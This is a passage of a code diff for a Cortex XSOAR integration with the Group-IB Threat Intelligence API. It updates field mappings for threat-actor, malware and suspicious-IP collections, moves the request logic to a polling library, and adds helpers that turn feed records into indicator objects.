"id", + # Information from Group-IB + "id": "id", # GIB ID + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "sources": "sources", # GIB VPN Sources + "names": "names", # GIB VPN Names + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("suspicious_ip/vpn"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, + }, + "suspicious_ip/scanner": { # GIB Source:sourceType, severity:systemSeverity + "name": "id", + # Information from Group-IB + "id": "id", # GIB ID + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("suspicious_ip/scanner"), + "dynamic": "id", + } + }, + "categories": "categories", # GIB Scanner Categories + "sources": "sources", # GIB Scanner Sources + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, + }, + "malware/cnc": { # GIB Source:sourceType + "name": "cnc", + # Information from Group-IB + "id": "id", # GIB ID + "cnc": "cnc", # GIB CNC URL + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "dateDetected": "dateDetected", # GIB Date of Detection + "domain": "domain", # GIB Malware CNC Domain + "malwareList": { # GIB Malware Table + "id": "malwareList.id", + "name": "malwareList.name", + }, + # End Information from Group-IB + # Group-IB Threat Actor + "threatActor": { # GIB Threat Actors Table + "id": "threatActor.id", + "name": "threatActor.name", + }, + # End Group-IB Threat Actor + "indicators": { # GIB Related Indicators Data + "url": "url", + "domain": "domain", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "cnc": "cnc", + }, + }, + "malware/malware": { # GIB Source:sourceType + # Information from Group-IB + "id": "id", # GIB ID + "name": "name", + "malware_name": "name", # GIB Malware Name + "updatedAt": "updatedAt", # GIB Date Updated At + "aliases": "aliases", # GIB Malware Aliases + "category": "category", # GIB Malware Categories + "description": "description", # GIB Malware Description + "shortDescription": "shortDescription", # GIB Malware Short Description + "geoRegion": "geoRegion", # GIB Malware Regions + "langs": "langs", # GIB Malware Langs + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("malware/malware"), + "dynamic": "id", + } + }, + "sourceCountry": "sourceCountry", # GIB Malware Source Countries + "platform": "platform", # GIB Malware Platforms + "threatLevel": "threatLevel", # GIB Threat Level + # End Information from Group-IB + # Group-IB Threat Actor + "taList": { # GIB Threat Actors Table + "id": "taList.id", + "name": "taList.name", + }, + # END Group-IB Threat Actor + }, + "hi/threat": { # GIB Source:sourceType, severity:systemSeverity + "name": "threatActor.name", + # Group-IB Threat Actor + "threatActor": { + "country": "threatActor.country", # GIB Threat Actor Country + "id": "threatActor.id", # GIB Threat Actor ID + "isAPT": "threatActor.isAPT", # GIB Threat Actor is APT + "name": "threatActor.name", # GIB Threat Actor Name + }, + # END Group-IB Threat Actor + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # Group-IB Cybercriminal Forum Information + "forumsAccounts": { # GIB Cybercriminal Forums Table + "nickname": "forumsAccounts.nickname", + "url": "forumsAccounts.url", + }, + # END Group-IB Cybercriminal Forum Information + # Information from Group-IB + "id": "id", # GIB ID + "title": "title", # GIB Cybercriminal Threat Title + "description": "description", # GIB Cybercriminal Threat Description + "createdAt": "createdAt", # GIB Date Created At + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "isTailored": "isTailored", # GIB Is Tailored + "expertise": "expertise", # GIB Cybercriminal Expertises + "regions": "regions", # GIB Cybercriminal Regions + "sectors": "sectors", # GIB Cybercriminal Sectors + "reportNumber": "reportNumber", # GIB Report Number + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("hi/threat"), + "dynamic": "id", + } + }, + # End Information from Group-IB + "indicators": { # GIB Related Indicators Data + "ipv4": "indicators.params.ipv4", + "domain": "indicators.params.domain", + "url": "indicators.params.url", + "hashes_md5": "indicators.params.hashes.md5", + "name": "indicators.params.name", + "hashes_sha1": "indicators.params.hashes.sha1", + "hashes_sha256": "indicators.params.hashes.sha256", + "size": "indicators.params.size", + }, + }, + "hi/threat_actor": { # GIB Source:sourceType + # Information from Group-IB + "name": "name", + "id": "id", # GIB ID + "aliases": "aliases", # GIB Cybercriminal Threat Actor Aliases + "description": "description", # GIB Cybercriminal Threat Actor Description + "isAPT": "isAPT", # GIB Threat Actor is APT + "threat_actor_name": "name", # GIB Threat Actor Name + "expertise": "stat.expertise", # GIB Cybercriminal Expertises + "regions": "stat.regions", # GIB Cybercriminal Regions + "sectors": "stat.sectors", # GIB Cybercriminal Sectors + "malware": "stat.malware", # GIB Cybercriminal Malware + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("hi/threat_actor"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Threat Actor Reports + "reports": { # GIB Cybercriminal Threat Actor Reports Table + "id": "stat.reports.id", + "name": "stat.reports.name.en", + "datePublished": "stat.reports.datePublished", + }, + # END Group-IB Threat Actor Reports + # Group-IB Dates + "createdAt": "createdAt", # GIB Date Created At + "updatedAt": "updatedAt", # GIB Date Updated At + "dateFirstSeen": "stat.dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "stat.dateLastSeen", # GIB Date Last Seen + # END Group-IB Dates + }, + "apt/threat_actor": { # GIB Source:sourceType + # Information from Group-IB + "name": "name", + "id": "id", # GIB ID + "aliases": "aliases", # GIB Nation-State Cybercriminals Threat Actor Aliases + "country": "country", # GIB Nation-State Cybercriminals Threat Actor Country + "description": "description", # GIB Nation-State Cybercriminals Threat Actor Description + "goals": "goals", # GIB Nation-State Cybercriminals Threat Actor Goals + "isAPT": "isAPT", # GIB Threat Actor is APT + "labels": "labels", # GIB Nation-State Cybercriminals Threat Actor Labels + "threat_actor_name": "name", # GIB Threat Actor Name + "roles": "roles", # GIB Nation-State Cybercriminals Threat Actor Roles + "cve": "stat.cve", # GIB Nation-State Cybercriminals Threat Actor CVE + "expertise": "stat.expertise", # GIB Nation-State Cybercriminals Expertises + "malware": "stat.malware", # GIB Nation-State Cybercriminals Malware + "regions": "stat.regions", # GIB Nation-State Cybercriminals Regions + "sectors": "stat.sectors", # GIB Nation-State Cybercriminals Sectors + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("apt/threat_actor"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Threat Actor Reports + "reports": { # GIB Nation-State Cybercriminals Threat Actor Reports Table + "id": "stat.reports.id", + "name": "stat.reports.name.en", + "datePublished": "stat.reports.datePublished", + }, + # END Group-IB Threat Actor Reports + # Group-IB Dates + "createdAt": "createdAt", # GIB Date Created At + "dateFirstSeen": "stat.dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "stat.dateLastSeen", # GIB Date Last Seen + "updatedAt": "updatedAt", # GIB Date Updated At + # END Group-IB Dates + }, + "apt/threat": { # GIB Source:sourceType, severity:systemSeverity + "name": "threatActor.name", + # Information from Group-IB + "id": "id", # GIB ID + "title": "title", # GIB Nation-State Cybercriminals Threat Title + "countries": "countries", # GIB Nation-State Cybercriminals Threat Countries + "description": "description", # GIB Nation-State Cybercriminals Threat Description + "expertise": "expertise", # GIB Nation-State Cybercriminals Threat Expertises + "isTailored": "isTailored", # GIB Is Tailored + "labels": "labels", # GIB Nation-State Cybercriminals Threat Actor Labels + "langs": "langs", # GIB Nation-State Cybercriminals Threat Langs + "regions": "regions", # GIB Nation-State Cybercriminals Threat Regions + "reportNumber": "reportNumber", # GIB Nation-State Cybercriminals Threat Report Number + "sectors": "sectors", # GIB Nation-State Cybercriminals Threat Sectors + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("apt/threat"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Dates + "createdAt": "createdAt", # GIB Date Created At + "dateFirstSeen": "stat.dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "stat.dateLastSeen", # GIB Date Last Seen + "datePublished": "datePublished", # GIB Date Published + # END Group-IB Dates + # Group-IB Threat Actor + "threatActor": { + "country": "threatActor.country", # GIB Threat Actor Country + "id": "threatActor.id", # GIB Threat Actor ID + "isAPT": "threatActor.isAPT", # GIB Threat Actor is APT + "name": "threatActor.name", # GIB Threat Actor Name + }, + # END Group-IB Threat Actor + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # Group-IB Cybercriminal Forum Information + "forumsAccounts": { # GIB Nation-State Cybercriminal Forums Table + "nickname": "forumsAccounts.nickname", + "url": "forumsAccounts.url", + }, + # END Group-IB Cybercriminal Forum Information + "indicators": { # GIB Related Indicators Data + "ipv4": "indicators.params.ipv4", + "domain": "indicators.params.domain", + "url": "indicators.params.url", + "hashes_md5": "indicators.params.hashes.md5", + "name": "indicators.params.name", + "hashes_sha1": "indicators.params.hashes.sha1", + "hashes_sha256": "indicators.params.hashes.sha256", + "size": "indicators.params.size", + }, }, - "hi/threat_actor": {"prefix": "Threat Actor"}, - "apt/threat_actor": {"prefix": "Threat Actor"} } -STATUS_CODE_MSGS = { - 401: "Bad Credentials", - 403: "Something is wrong with your account, please, contact GIB.", - 404: "Not found. There is no such data on server.", - 500: "There are some troubles on server with your request.", - 301: "Verify that your public IP is whitelisted by Group IB.", - 302: "Verify that your public IP is whitelisted by Group IB." +DEPRECATED_COLLECTIONS = { + "malware/targeted_malware": "malware/malware", + "compromised/masked_cards": "compromised/bank_card_group", + "compromised/bank_card": "compromised/bank_card_group", + "compromised/card": "compromised/bank_card_group", + "compromised/account": "compromised/account_group", + "attacks/phishing": "attacks/phishing_group", } -# LEGACY_HEADERS = { -# "Accept": "application/json", -# 'Connection': 'Keep-Alive', -# 'Keep-Alive': "30" -# } - -TIMEOUT = 60. -RETRIES = 4 -STATUS_LIST_TO_RETRY = [429, 500] +REMOVED_COLLECTIONS = ["bp/phishing", "bp/phishing_kit", "compromised/imei"] class Client(BaseClient): @@ -439,590 +1400,699 @@ class Client(BaseClient): Should only do requests and return data. """ - def _create_update_generator(self, collection_name: str, max_requests: int, - date_from: str | None = None, seq_update: int | str = '', - limit: int = 200) -> Generator: - """ - Creates generator of lists with feeds class objects for an update session - (feeds are sorted in ascending order) `collection_name` with set parameters. - - `seq_update` allows you to receive all relevant feeds. Such a request uses the seq_update parameter, - you will receive a portion of feeds that starts with the next `seq_update` parameter for the current collection. - For all feeds in the Group IB Intelligence continuous numbering is carried out. - For example, the `seq_update` equal to 1999998 can be in the `compromised/accounts` collection, - and a feed with seq_update equal to 1999999 can be in the `attacks/ddos` collection. - If item updates (for example, if new attacks were associated with existing APT by our specialists - or tor node has been detected as active again), the item gets a new parameter and it automatically rises - in the database and "becomes relevant" again. - - :param collection_name: collection to update. - :param max_requests: a maximum number of requests to API. - :param date_from: start date of update session. - :param seq_update: identification number from which to start the session. - """ - requests_count = 0 - while True: - if requests_count >= max_requests: - break - session = requests.Session() - session.auth = HTTPBasicAuth(self._auth[0], self._auth[1]) - - session.headers["Accept"] = "*/*" - session.headers["User-Agent"] = f'SOAR/CortexSOAR/{self._auth[0]}/unknown' - - params = {'df': date_from, 'limit': limit, 'seqUpdate': seq_update} - params = {key: value for key, value in params.items() if value} - portion = session.get(url=f'{self._base_url}{collection_name}/updated', params=params, timeout=60).json() - - # params = {"df": date_from, "seqUpdate": seq_update} - # params = assign_params(**params) - # portion = self._http_request(method="GET", url_suffix=collection_name + "/updated", - # params=params, timeout=TIMEOUT, retries=RETRIES, - # status_list_to_retry=STATUS_LIST_TO_RETRY) - if portion.get("count") == 0: - break - seq_update = portion.get("seqUpdate") - date_from = None - requests_count += 1 + limit = 100 + + def __init__(self, base_url, verify=True, proxy=False, headers=None, auth=None): + super().__init__( + base_url=base_url, verify=verify, proxy=proxy, headers=headers, auth=auth + ) - yield portion.get("items"), seq_update + self._auth: tuple[str, str] + self.poller = TIPoller( + username=self._auth[0], + api_key=self._auth[1], + api_url=base_url, + ) + self.poller.set_product( + product_type="SOAR", + product_name="CortexSOAR", + product_version="unknown", + integration_name="Group-IB Threat Intelligence", + integration_version="2.0.0", + ) - def _create_search_generator(self, collection_name: str, max_requests: int, date_to: str = None, - page: int = 0, starting_date_from: str = None, - starting_date_to: str = None, limit: int = 200) -> Generator: + @staticmethod + def handle_first_time_fetch(kwargs: dict[str, Any]) -> tuple[str, str | None]: """ - Creates generator of lists with feeds for the search session for ingestion purpose - (feeds are sorted in descending order) for `collection_name` with set parameters. This version solves problem - with a large number of feeds with the same date. - - :param collection_name: collection to search. - :param max_requests: a maximum number of requests to API. - :param date_to: current search location. - :param page: number of pages from start. - :param starting_date_from: global down border for a session. - :param starting_date_to: global upper border for a session. + Handle first time fetch """ + date_from = None + last_fetch = kwargs.get("last_fetch") + if not last_fetch: + date_from = dateparser_parse(date_string=kwargs.get("first_fetch_time")) # type: ignore + if date_from is None: + raise DemistoException( + "Inappropriate first_fetch format, " + f"please use a format such as: 2020-01-01 or January 1 2020 or 3 days. The format given is: {date_from}" + ) + date_from = date_from.strftime("%Y-%m-%d") # type: ignore - requests_count = 0 - result_id = None - no_data_flag = 0 - while True: - if requests_count >= max_requests or no_data_flag: - break - - if page and not result_id: - k = 0 - while k != page: - if result_id: - params = {'resultId': result_id} - else: - params = {'df': starting_date_from, 'dt': date_to} - params = assign_params(**params) - portion = self._http_request(method="GET", url_suffix=collection_name, - params=params, timeout=TIMEOUT, retries=RETRIES, - status_list_to_retry=STATUS_LIST_TO_RETRY) - result_id = portion.get("resultId") - k += 1 - - if result_id: - params = {'resultId': result_id} - else: - params = {'df': starting_date_from, 'dt': date_to} - params = assign_params(**params) - portion = self._http_request(method="GET", url_suffix=collection_name, - params=params, timeout=TIMEOUT, retries=RETRIES, - status_list_to_retry=STATUS_LIST_TO_RETRY) + return last_fetch, date_from # type: ignore - requests_count += 1 - data = portion.get('items') - if len(data) < 100: - no_data_flag = 1 - page = 0 - starting_date_from = (dateparser.parse(starting_date_to) # type: ignore - + timedelta(seconds=1)).strftime(DATE_FORMAT) - starting_date_to = datetime.now().strftime(DATE_FORMAT) - date_to = starting_date_to - else: - if data[0].get("uploadTime") == data[-1].get("uploadTime"): - page += 1 - else: - result_id = None - page = 0 - for i in range(len(data) - 1, -1, -1): - if data[i].get("uploadTime") != data[-1].get("uploadTime"): - upload_time_parsed = dateparser.parse(data[i].get("uploadTime")) - assert upload_time_parsed is not None, f'could not parse {data[i].get("uploadTime")}' - date_to = (upload_time_parsed - timedelta(seconds=1)).strftime(DATE_FORMAT) - data = data[:i + 1:] - break - - last_fetch = {"starting_date_from": starting_date_from, "page": page, - "starting_date_to": starting_date_to, "current_date_to": date_to} - yield data, last_fetch - - # def _create_legacy_generator(self, action: str, max_requests: int, last: Optional[str] = None) -> Generator: - # """ - # Legacy generator is similar to update generator. - # - # :param action: collection to search. - # :param max_requests: a maximum number of requests to API. - # :param last: identification number from which to start the session. - # """ - # requests_count = 0 - # while True: - # if requests_count >= max_requests: - # break - # - # params = {"action": action, "last": last, "module": "get", "lang": 3} - # params = assign_params(**params) - # portion = self._http_request(method="GET", full_url="https://bt.group-ib.com", - # headers=LEGACY_HEADERS, params=params, timeout=TIMEOUT, retries=RETRIES, - # status_list_to_retry=STATUS_LIST_TO_RETRY) - # if portion.get("status") != 200: - # if portion.get("status") in STATUS_CODE_MSGS: - # raise DemistoException(STATUS_CODE_MSGS[portion.get("status")]) - # else: - # raise DemistoException( - # "Something is wrong, status code {0} for request to APIv1".format(portion.get("status")) - # ) - # portion = portion.get("data") - # - # if portion.get("count") == 0: - # break - # last = portion.get("last") - # requests_count += 1 - # - # yield portion.get("new"), last - # - # def _legacy_get_last(self, date_from, action): - # """ - # Get last for a certain date. - # - # :param action: collection to search. - # :param date_from: date to get the "last" identifier. - # """ - # params = {"action": "get_last", "date": date_from, "module": "get", "type": action} - # params = assign_params(**params) - # resp = self._http_request(method="GET", full_url="https://bt.group-ib.com", - # headers=LEGACY_HEADERS, params=params, timeout=TIMEOUT, retries=RETRIES, - # status_list_to_retry=STATUS_LIST_TO_RETRY) - # if resp.get("status") != 200: - # if resp.get("status") in STATUS_CODE_MSGS: - # raise DemistoException(STATUS_CODE_MSGS[resp.get("status")]) - # else: - # raise DemistoException( - # "Something is wrong, status code {0} for request to APIv1".format(resp.get("status")) - # ) - # last = resp.get("data") - # return last - - def create_poll_generator(self, collection_name: str, max_requests: int, **kwargs): + def create_poll_generator( + self, collection_name: str, hunting_rules: int, **kwargs + ): """ Interface to work with different types of indicators. """ - # Handle first time fetch - date_from = None - last_fetch = kwargs.get("last_fetch") - if not last_fetch: - date_from = dateparser.parse(kwargs.get("first_fetch_time")) # type: ignore - if date_from is None: - raise DemistoException('Inappropriate first_fetch format, ' - 'please use something like this: 2020-01-01 or January 1 2020 or 3 days') - date_from = date_from.strftime('%Y-%m-%d') # type: ignore + last_fetch, date_from = Client.handle_first_time_fetch(kwargs) if collection_name == "compromised/breached": + hunting_rules = 1 + # we need the isinstance check for BC because it used to be a string + if last_fetch and isinstance(last_fetch, dict): starting_date_from = last_fetch.get("starting_date_from") starting_date_to = last_fetch.get("starting_date_to") date_to = last_fetch.get("current_date_to") - page = last_fetch.get("page", 0) else: starting_date_from = date_from starting_date_to = datetime.now().strftime(DATE_FORMAT) date_to = starting_date_to - page = 0 - return self._create_search_generator(collection_name=collection_name, max_requests=max_requests, - date_to=date_to, page=page, starting_date_from=starting_date_from, - starting_date_to=starting_date_to) - # elif collection_name == "bp/domain": - # if not last_fetch: - # last_fetch = self._legacy_get_last(date_from=date_from, action="domain") - # return self._create_legacy_generator(action="domain", max_requests=max_requests, last=last_fetch) + + return self.poller.create_search_generator( + collection_name=collection_name, + date_from=date_from, + date_to=date_to, + limit=self.limit, + apply_hunting_rules=hunting_rules, + ), { + "starting_date_from": starting_date_from, + "starting_date_to": starting_date_to, + "current_date_to": date_to, + } + else: - return self._create_update_generator(collection_name=collection_name, max_requests=max_requests, - date_from=date_from, seq_update=last_fetch) # type: ignore + if collection_name in COLLECTIONS_THAT_ARE_REQUIRED_HUNTING_RULES: + hunting_rules = 1 + return ( + self.poller.create_update_generator( + collection_name=collection_name, + date_from=date_from, + sequpdate=last_fetch, + limit=self.limit, + apply_hunting_rules=hunting_rules, + ), + last_fetch, + ) + + def search_proxy_function(self, query: str) -> list[dict[str, Any]]: + return self.poller.global_search(query=query) + + def get_available_collections_proxy_function(self) -> list: + return self.poller.get_available_collections() - def create_manual_generator(self, collection_name: str, date_from: str = None, - date_to: str = None, query: str = None) -> Generator: - """ - Creates generator of lists with feeds for the search session - (feeds are sorted in descending order) for `collection_name` with set parameters. - :param collection_name: collection to search. - :param date_from: start date of search session. - :param date_to: end date of search session. - :param query: query to search. - """ +""" Support functions """ - result_id = None - while True: - params = {'df': date_from, 'dt': date_to, 'resultId': result_id, 'q': query} - params = assign_params(**params) - portion = self._http_request(method="GET", url_suffix=collection_name, - params=params, timeout=TIMEOUT, retries=RETRIES, - status_list_to_retry=STATUS_LIST_TO_RETRY) - if portion.get('count') > 2000: - raise DemistoException('Portion is too large (count > 2000), this can cause timeout in Demisto.' - 'Please, change or set date_from/date_to arguments or change query.') - if len(portion.get('items')) == 0: - break - result_id = portion.get("resultId") - date_from, date_to, query = None, None, None - yield portion.get('items') - def search_feed_by_id(self, collection_name: str, feed_id: str) -> dict: - """ - Searches for feed with `feed_id` in collection with `collection_name`. +class CommonHelpers: + @staticmethod + def transform_dict( + input_dict: dict[str, list[str | list[Any]] | str | None] + ) -> list[dict[str, Any]]: + if not input_dict: + return [{}] - :param collection_name: in what collection to search. - :param feed_id: id of feed to search. - """ - portion = self._http_request(method="GET", url_suffix=collection_name + "/" + feed_id, timeout=TIMEOUT, - retries=RETRIES, status_list_to_retry=STATUS_LIST_TO_RETRY, - backoff_factor=random.random() * 10 + 1) + normalized_dict = { + k: v if isinstance(v, list) else [v] for k, v in input_dict.items() # type: ignore + } - return portion + max_length = max( + (len(v) for v in normalized_dict.values() if isinstance(v, list)), default=1 + ) - def get_available_collections(self): - """ - Gets list of available collections from GIB TI&A API. - """ + result = [] + for i in range(max_length): + result.append( + { + k: (v[i] if i < len(v) else (v[0] if v else None)) + for k, v in normalized_dict.items() + } + ) - response = self._http_request(method="GET", url_suffix="user/granted_collections", - timeout=TIMEOUT, retries=RETRIES, - status_list_to_retry=STATUS_LIST_TO_RETRY) - buffer_list = find_element_by_key(response, 'collection') - - # buffer_list = list(response.get("list").keys()) - # - # try: - # self._http_request(method="GET", url_suffix="compromised/breached", params={"limit": 1}, - # timeout=TIMEOUT, retries=RETRIES, status_list_to_retry=STATUS_LIST_TO_RETRY) - # buffer_list.append("compromised/breached") - # except Exception: - # pass - # - # # legacy collection - # try: - # params = {"action": "get_last", "date": datetime.now().strftime("%Y-%m-%d"), - # "module": "get", "type": "domain"} - # response = self._http_request(method="GET", full_url="https://bt.group-ib.com", - # headers=LEGACY_HEADERS, params=params, timeout=TIMEOUT, retries=RETRIES, - # status_list_to_retry=STATUS_LIST_TO_RETRY) - # last = response.get("data") - # params = {"action": "domain", "last": last, "module": "get"} - # portion = self._http_request(method="GET", full_url="https://bt.group-ib.com", - # headers=LEGACY_HEADERS, params=params, timeout=TIMEOUT, retries=RETRIES, - # status_list_to_retry=STATUS_LIST_TO_RETRY) - # if portion.get("status") == 200: - # buffer_list.append("bp/domain") - # except Exception: - # pass - - collections_list = [] - for key in MAPPING: - if key in buffer_list: - collections_list.append(key) - return {"collections": collections_list}, buffer_list - - def search_by_query(self, q): - results = self._http_request(method="GET", url_suffix="search", params={'q': q}, - timeout=TIMEOUT, retries=RETRIES, - status_list_to_retry=STATUS_LIST_TO_RETRY) - return results + return result + @staticmethod + def remove_underscore_and_lowercase_keys( + dict_list: list[dict[str, Any]] | list[dict[str, Any]] + ) -> list[dict[str, Any]]: + updated_dicts = [] -def test_module(client: Client) -> str: - """ - Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful. + for d in dict_list: + new_dict = {} + for key, value in d.items(): + new_key = key.replace("_", "").lower() + new_dict[new_key] = value - :param client: GIB_TI&A client - :return: 'ok' if test passed, anything else will fail the test. - """ + updated_dicts.append(new_dict) - collections_list, _ = client.get_available_collections() - for collection in collections_list.get("collections"): - if collection not in MAPPING: - return "Test failed, some problems with getting available collections." - return "ok" + return updated_dicts + @staticmethod + def replace_empty_values( + data: dict[str, Any] | list[dict[str, Any]] + ) -> dict[str, Any] | list[dict[str, Any]]: -""" Support functions """ + if isinstance(data, dict): + return { + key: CommonHelpers.replace_empty_values(value) + for key, value in data.items() + } + elif isinstance(data, list): + if not data: + return None # type: ignore -def find_element_by_key(obj, key): - """ - Recursively finds element or elements in dict. - """ + if all(isinstance(item, list) and not item for item in data): + return None # type: ignore + + return [CommonHelpers.replace_empty_values(item) for item in data] # type: ignore - path = key.split(".", 1) - if len(path) == 1: - if isinstance(obj, list): - return [i.get(path[0]) for i in obj if i not in ["255.255.255.255", "0.0.0.0", ""]] - elif isinstance(obj, dict): - if obj.get(path[0]) in ["255.255.255.255", "0.0.0.0", ""]: - return None - else: - return obj.get(path[0]) - else: - if obj in ["255.255.255.255", "0.0.0.0", ""]: - return None - else: - return obj - else: - if isinstance(obj, list): - return [find_element_by_key(i.get(path[0]), path[1]) for i in obj] - elif isinstance(obj, dict): - return find_element_by_key(obj.get(path[0]), path[1]) else: - if obj in ["255.255.255.255", "0.0.0.0", ""]: + if data == "": return None + return data + + @staticmethod + def all_lists_empty(data: dict[str, Any] | list[Any]) -> bool: + all_empty = True + + if isinstance(data, dict): + for value in data.values(): + if isinstance(value, list): + if value: + all_empty = False + elif isinstance(value, dict) and not CommonHelpers.all_lists_empty(value): + all_empty = False + elif isinstance(data, list): + for item in data: + if isinstance(item, dict) and not CommonHelpers.all_lists_empty(item): + all_empty = False + + return all_empty + + @staticmethod + def date_parse(date: str, arg_name: str) -> str: + date_from_parsed = dateparser_parse(date) + if date_from_parsed is None: + raise DemistoException( + f"Inappropriate {arg_name} format, " + "please use something like this: 2020-01-01 or January 1 2020" + ) + date_from_parsed = date_from_parsed.strftime(DATE_FORMAT) + return date_from_parsed + + @staticmethod + def remove_html_tags(entry: dict, collection_name: str) -> dict: + if collection_name in HTML_FIELDS: + fields = HTML_FIELDS.get(collection_name, []) + for field in fields: + entry_field_value = entry.get(field, None) + if isinstance(entry_field_value, str): + entry_field_value = re.sub(r"<[^>]+>", "", entry_field_value) + entry[field] = entry_field_value + + return entry + + @staticmethod + def transform_list_to_str(data: list[dict]) -> list[dict]: + for item in data: + if isinstance(item, dict): + for key, value in item.items(): + if isinstance(value, list): + item[key] = ", ".join(str(v) for v in value) + return data + + @staticmethod + def custom_generate_portal_link(collection_name: str, incident: dict): + if ( + collection_name + in COLLECTIONS_FOR_WHICH_THE_PORTAL_LINK_WILL_BE_GENERATED + ): + # generating just for compromised/breached + incident["portalLink"] = PORTAL_LINKS.get( + "compromised/breached", "" + ) + str(incident["emails"][0]) + + return incident + + @staticmethod + def validate_collections(collection_name): + + if collection_name in DEPRECATED_COLLECTIONS: + raise Exception( + f"Collection {collection_name} is obsolete. Please use {DEPRECATED_COLLECTIONS.get(collection_name)}") + if collection_name in REMOVED_COLLECTIONS: + raise Exception(f"The {collection_name} collection is not valid") + + +class IndicatorsHelper: + + @staticmethod + def check_empty_list(add_fields: dict) -> bool: + dict_len = len(add_fields) + empty_found_count = 0 + for _key, value in add_fields.items(): + if isinstance(value, list) and len(value) < 1: + empty_found_count += 1 + + return dict_len == empty_found_count + + @staticmethod + def parse_to_outputs( + value: str | None | list, indicator_type: str, fields: dict + ) -> Any: + def calculate_dbot_score(type_): + severity = fields.get("evaluation", {}).get("severity") + if severity == "green": + score = Common.DBotScore.GOOD + elif severity == "orange": + score = Common.DBotScore.SUSPICIOUS + elif severity == "red": + score = Common.DBotScore.BAD else: - return obj - + score = Common.DBotScore.NONE + + return Common.DBotScore( + indicator=value, + indicator_type=type_, + integration_name="GIB TI&A", + score=score, + ) + + indicator: Any = None + if ( + (value is not None and len(value) > 0) or len(fields) > 0 + ) and IndicatorsHelper.check_empty_list(fields) is False: + if indicator_type == "IP": + indicator = Common.IP( + ip=value, + asn=fields.get("asn"), + geo_country=fields.get("geocountry"), + geo_description=fields.get("geolocation"), + dbot_score=calculate_dbot_score(DBotScoreType.IP), + ) + elif indicator_type == "Domain": + indicator = Common.Domain( + domain=value, + registrar_name=fields.get("registrarname"), + dbot_score=calculate_dbot_score(DBotScoreType.DOMAIN), + ) + elif indicator_type == "File": + indicator = Common.File( + md5=value, + sha1=fields.get("sha1"), + sha256=fields.get("sha256"), + name=fields.get("gibfilename"), + size=fields.get("size"), + dbot_score=calculate_dbot_score(DBotScoreType.FILE), + ) + elif indicator_type == "URL": + indicator = Common.URL( + url=value, dbot_score=calculate_dbot_score(DBotScoreType.URL) + ) + elif indicator_type == "CVE": + indicator = Common.CVE( + id=value, + cvss=fields.get("cvss"), + published=fields.get("published"), + modified=fields.get("cvemodified"), + description=fields.get("cvedescription"), + ) + return indicator + + @staticmethod + def find_iocs_in_feed(feed: str | dict[Any, Any], collection_name: str) -> list: + """ + Finds IOCs in the feed and transform them to the appropriate format to ingest them into Demisto. -def transform_to_command_results(iocs, ioc_type, fields, fields_names, collection_name): - """ - Recursively ties together and transforms indicator data. - """ + :param feed: feed from GIB TI&A. + :param collection_name: which collection this feed belongs to. + """ - parsed_info = [] - if isinstance(iocs, list): - for i, ioc in enumerate(iocs): - buf_fields = [] - for field in fields: - if isinstance(field, list): - buf_fields.append(field[i]) - else: - buf_fields.append(field) - parsed_info.extend(transform_to_command_results(ioc, ioc_type, buf_fields, fields_names, collection_name)) - return parsed_info - else: - if iocs is None: - return [] - - fields = {fields_names[i]: fields[i] for i in range(len(fields_names)) if fields[i] is not None} - - output = parse_to_outputs(iocs, ioc_type, fields) - if output: - results = [CommandResults( - readable_output=tableToMarkdown(f"{ioc_type} indicator", {"value": iocs, **fields}), - indicator=output, - ignore_auto_extract=True - )] - return results - else: - return [] - - -def parse_to_outputs(value, indicator_type, fields): - def calculate_dbot_score(type_): - severity = fields.get("severity") - if severity == "green": - score = 